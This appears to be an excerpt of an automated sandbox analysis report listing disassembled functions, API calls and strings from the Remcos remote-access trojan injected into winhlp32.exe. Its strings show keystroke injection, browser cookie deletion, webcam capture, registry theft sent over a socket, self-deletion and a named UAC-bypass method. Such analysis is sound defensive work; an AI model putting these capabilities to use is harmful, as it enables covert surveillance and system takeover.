                                    • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                    • __freea.LIBCMT ref: 0044AE30
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                    • __freea.LIBCMT ref: 0044AE39
                                    • __freea.LIBCMT ref: 0044AE5E
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                    • String ID:
                                    • API String ID: 3864826663-0
                                    • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                    • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                    • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                    • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                    • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InputSend
                                    • String ID:
                                    • API String ID: 3431551938-0
                                    • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                    • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                    • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                    • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __freea$__alloca_probe_16_free
                                    • String ID: a/p$am/pm$zD
                                    • API String ID: 2936374016-2723203690
                                    • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                    • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                    • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                    • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                    • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Enum$InfoQueryValue
                                    • String ID: [regsplt]$xUG$TG
                                    • API String ID: 3554306468-1165877943
                                    • Opcode ID: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                                    • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                    • Opcode Fuzzy Hash: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                                    • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                    • __fassign.LIBCMT ref: 0044B479
                                    • __fassign.LIBCMT ref: 0044B494
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
                                    • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID:
                                    • API String ID: 1324828854-0
                                    • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                    • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                    • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                    • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID: D[E$D[E
                                    • API String ID: 269201875-3695742444
                                    • Opcode ID: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                                    • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                    • Opcode Fuzzy Hash: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                                    • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                      • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                      • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnumInfoOpenQuerysend
                                    • String ID: xUG$NG$NG$TG
                                    • API String ID: 3114080316-2811732169
                                    • Opcode ID: 33ae2b509f9f16c0ffb344733dc4e49a524601993d0187366b37a5b307e1f339
                                    • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                    • Opcode Fuzzy Hash: 33ae2b509f9f16c0ffb344733dc4e49a524601993d0187366b37a5b307e1f339
                                    • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                      • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                      • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                    • _wcslen.LIBCMT ref: 0041B763
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                    • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                    • API String ID: 37874593-122982132
                                    • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                    • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                    • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                    • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                      • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                      • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                    • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                    • API String ID: 1133728706-4073444585
                                    • Opcode ID: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                                    • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                    • Opcode Fuzzy Hash: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                                    • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                    • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                    • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                    • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041C3F1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                                    • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                    • CloseHandle.KERNEL32(00000000), ref: 0041C477
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreatePointerWrite
                                    • String ID: hpF
                                    • API String ID: 1852769593-151379673
                                    • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                    • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                    • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                    • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                    • _free.LIBCMT ref: 00450F48
                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00450F53
                                    • _free.LIBCMT ref: 00450F5E
                                    • _free.LIBCMT ref: 00450FB2
                                    • _free.LIBCMT ref: 00450FBD
                                    • _free.LIBCMT ref: 00450FC8
                                    • _free.LIBCMT ref: 00450FD3
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                    • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                    • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                    • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                    • int.LIBCPMT ref: 00411183
                                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                    • std::_Facet_Register.LIBCPMT ref: 004111C3
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                    • String ID: (mG
                                    • API String ID: 2536120697-4059303827
                                    • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                    • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                    • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                    • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                    • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                    • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                    • Opcode Fuzzy Hash: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                    • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                    Download Yara Rule
                                    APIs
                                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\winhlp32.exe), ref: 004075D0
                                      • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                      • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                    • CoUninitialize.OLE32 ref: 00407629
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InitializeObjectUninitialize_wcslen
                                    • String ID: C:\Windows\winhlp32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                    • API String ID: 3851391207-1839853256
                                    • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                    • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                    • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                    • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                    • GetLastError.KERNEL32 ref: 0040BAE7
                                    Strings
                                    • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                    • [Chrome Cookies not found], xrefs: 0040BB01
                                    • UserProfile, xrefs: 0040BAAD
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                    • API String ID: 2018770650-304995407
                                    • Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                    • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                    • Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                    • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041CD9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                    • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Console$AllocOutputShowWindow
                                    • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                    • API String ID: 2425139147-3065609815
                                    • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                    • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                    • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                    • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                    Download Yara Rule
                                    APIs
                                    • __allrem.LIBCMT ref: 0043AC69
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                    • __allrem.LIBCMT ref: 0043AC9C
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                    • __allrem.LIBCMT ref: 0043ACD1
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1992179935-0
                                    • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                    • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                    • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                    • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                      • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: H_prologSleep
                                    • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                    • API String ID: 3469354165-3054508432
                                    • Opcode ID: 7c33d7a2f0fbcfc682037ee12da25bfab69272e7d38e6870219f47a5674dbce2
                                    • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                    • Opcode Fuzzy Hash: 7c33d7a2f0fbcfc682037ee12da25bfab69272e7d38e6870219f47a5674dbce2
                                    • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00411CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                    • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                    • GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                      • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
